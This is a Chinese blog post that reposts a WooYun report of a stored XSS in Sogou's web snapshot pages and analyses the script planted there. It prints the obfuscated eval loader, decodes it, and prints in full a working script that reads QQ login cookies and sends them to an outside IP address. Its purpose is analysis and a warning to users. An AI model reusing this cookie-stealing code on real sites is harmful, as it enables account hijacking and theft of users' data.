关于之前搜狗快照的xss

分类目录: 原创随笔

1529

 cmoly 发布于 2015-01-24 4 条评论

当然,不是说还有什么 因为之前一直没删页面。也就不好说太多你懂的 在乌云是这么说的

漏洞概要 关注数(11) 关注此漏洞

缺陷编号: WooYun-2014-69640

漏洞标题: 搜狗快照存在持久型xss漏洞

相关厂商: 搜狗

漏洞作者: 风情万种

提交时间: 2014-07-25 11:00

公开时间: 2014-07-30 11:02

漏洞类型: xss跨站脚本攻击

危害等级: 中

自评Rank: 10

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org

Tags标签: 持久型xss 存储型xss

0人收藏收藏

分享漏洞:


漏洞详情

披露状态:

2014-07-25: 细节已通知厂商并且等待厂商处理中
2014-07-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

搜狗快照存储型xss 危害你懂得!

详细说明:

如:

http://www.sogou.com//websnapshot?ie=utf8&url=http%3A%2F%2Fqq.mb5u.com%2Fabout.html&did=65b505059bf9e58d-1152efedfc5effe9-134fa5d0b31d02dc09750e547cb02b87&k=fd2b0d13138196abc9b801bca9d59b27&encodedQuery=&query=qq.mb5u.com%2Fabout.html&&pid=sogou-wsse-7535bbb91c8fde34&duppid=1&w=01020400&m=0&st=0&uid=1250&ref=&furl=http%3A%2F%2Ftongjige.com%2F&title=%E7%BB%9F%E8%AE%A1%E5%93%A5_%E8%90%A5%E9%94%80%E7%8E%8B_%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1-%E8%AE%BF%E5%AE%A2QQ%E6%8A%93%E5%8F%96--%E8%AE%BF%E5%AE%A2QQ%E6%8F%90%E5%8F%96-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E6%8A%93%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E8%8E%B7%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E6%8F%90%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E7%BB%9F%E8%AE%A1QQ%E7%B3%BB%E7%BB%9F%E6%BA%90%E7%A0%81%7C%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1%7CQQ%E8%AE%BF%E5%AE%A2%E7%BB%9F%E8%AE%A1

查看源码

20140725095914.png

漏洞证明:

code 区域
/*_Ka*/var/*hCnn*/IHse/*Wav*/=/*fBJAp*/\u0053\u0074\u0072\u0069\u006e\u0067./*lsxIcC*/\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065;/*ksHMx*/var/*KuVkYP*/NWVbw_QY/*_ztkzYy*/=/*_pNZE*/\u0065\u0076\u0061\u006c;NWVbw_QY(IHse(118,97,114,32,111,72,101,97,100,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,72,69,65,68,39,41,46,105,116,101,109,40,48,41,59,118,97,114,32,111,83,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,83,99,114,105,112,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,111,83,99,114,105,112,116,46,115,114,99,61,34,104,116,116,112,58,47,47,113,113,46,109,98,53,117,46,99,111,109,47,113,113,46,106,115,34,59,111,72,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,111,83,99,114,105,112,116,41,59));

解密

code 区域
//第一次解密
var IHse=function String.fromCharCode();
var NWVbw_QY= function eval();
NWVbw_QY(IHse(118,97,114,32,111,72,101,97,100,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,72,69,65,68,39,41,46,105,116,101,109,40,48,41,59,118,97,114,32,111,83,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,83,99,114,105,112,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,111,83,99,114,105,112,116,46,115,114,99,61,34,104,116,116,112,58,47,47,113,113,46,109,98,53,117,46,99,111,109,47,113,113,46,106,115,34,59,111,72,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,111,83,99,114,105,112,116,41,59));
//二次解密
var oHead=document.getElementsByTagName('HEAD').item(0);var oScript= document.createElement("script");oScript.type="text/javascript";oScript.src="http://qq.mb5u.com/qq.js";oHead.appendChild(oScript);

http://qq.mb5u.com/qq.js 是盗取cookie的

 然后看见大牛们的评论

评论

  1. 2014-07-25 11:16 | 贫道来自河北 ( 普通白帽子 | Rank:464 漏洞数:160 )

    1

    坐等公开

    1#
  2. 2014-07-25 12:54 | Jumbo ( 实习白帽子 | Rank:52 漏洞数:15 | 猫)

    0

    快照--

    2#
  3. 2014-07-25 13:04 | M4sk ( 普通白帽子 | Rank:614 漏洞数:209 )

    0

    - -快照

    3#
  4. 2014-07-25 13:09 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

    0

    快照....

    4#
  5. 2014-07-30 11:57 | 大白菜 ( 实习白帽子 | Rank:51 漏洞数:18 )

    0

    ....这是获取QQ号的 尼玛盗取cookies。。。。。人才啊你!!!这玩意连接是自己内部放的。做推广用的

    5#
  6. 2014-08-05 09:40 | 落叶 ( 路人 | Rank:1 漏洞数:2 | xxxx)

    0

    那么多人你不举报,就举报我? 跟我有仇杂的

    6#
  7. 2014-08-05 09:51 | 风情万种 ( 普通白帽子 | Rank:181 漏洞数:63 | 不再相信爱了)

    0

    @落叶 不好意思 路过而已

     

     

然后看看我解密出来的那个qq.js 我只想说呵呵

 

var u1 = Gc5u('pt2gguin');
var u2 = Gc5u('o_cookie');
var u3 = Gc5u('p_uin');
var u4 = Gc5u('uin');
var u5 = Gc5u('ptui_loginuin');
var u6 = Gc5u('uin_cookie');
var u7 = Gc5u('luin');
var u8 = Gc5u('qm_username');
var quin = u1 || u2 || u3 || u4 || u5 || u6 || u7 || u8;
if (quin == null) {
        var b = 'http://42.120.11.238:8888/m/wdl.php?c=' + Re5u('fkid') + '&d=1'
        var a = document.createElement('script');
        a.type = 'text/javascript';
        a.charset = 'utf-8';
        a.src = b;
        document.getElementsByTagName('HEAD').item(0).appendChild(a)
} else {
        var auin = [
                u1,
                u2,
                u3,
                u4,
                u5,
                u6,
                u7,
                u8
        ];
        var buin = [
        ];
        var cuin = [
        ];
        var uq = {
        };
        for (var i = 0; i < auin.length; i++) {
                if (auin[i] != null) {
                        var a = auin[i].replace(/^[o|0]*/gi, '');
                        buin.push(a)
                }
        }
        for (var i = 0; i < buin.length; i++) {
                if (!uq[buin[i]]) {
                        uq[buin[i]] = true;
                        if (parseInt(buin[i]) > 10051) {
                                cuin.push(buin[i])
                        }
                }
        }
        cuin = cuin.reverse();
        for (var i = 0; i < cuin.length; i++) {
                var a = cuin[i]
                var b = Re5u('uid');
                var c = Re5u('ref');
                var d = Re5u('furl');
                var e = Re5u('title');
                var f = 'http://42.120.11.238:8888/?action=saveQQ';
                f += '&qq=' + a;
                f += '&uid=' + b;
                f += '&referrer=' + c;
                f += '&url=' + d;
                f += '&title=' + e;
                f += '&r=' + (new Date()).getTime();
                var g = document.createElement('script');
                g.type = 'text/javascript';
                g.src = f;
                document.getElementsByTagName('HEAD').item(0).appendChild(g)
        }
}
function Gc5u(a) {//cookiea()
        var b,
        reg = new RegExp('(^| )' + a + '=([^;]*)(;|$)'); //
        if (b = document.cookie.match(reg)) //|;|cookiea()
        {
                return unescape(b[2]); //
        } else {
                return null
        }
}
function Re5u(a) {
        var b = document.location.href;
        var c = b.substring(b.indexOf('?') + 1).split('&');
        for (var i = 0; i < c.length; i++) {
                var d = c[i].indexOf(a + '=');
                if (d != - 1) {
                        return c[i].replace(a + '=', '').replace('?', '');
                        break
                }
        }
        return ''
}

何止是QQ cookie都够登录很多东西了吧 上你的QQ发几个广告是没问题了的,所以纠正一下 不是你的QQ号中毒了只是cookie被盗取了发几个小广告而已!发现帐号被莫名其妙发广告什么的就赶紧改密码吧亲。。。。

发表评论

点击这里取消回复。

全部评论 / 4

  1. 2015-2-8 17:30回复
    试试
    • 2015-2-8 17:36回复
      、什么是@
    • 2015-2-12 15:30回复
      试试
  2. 2015-2-8 17:36回复
    再试试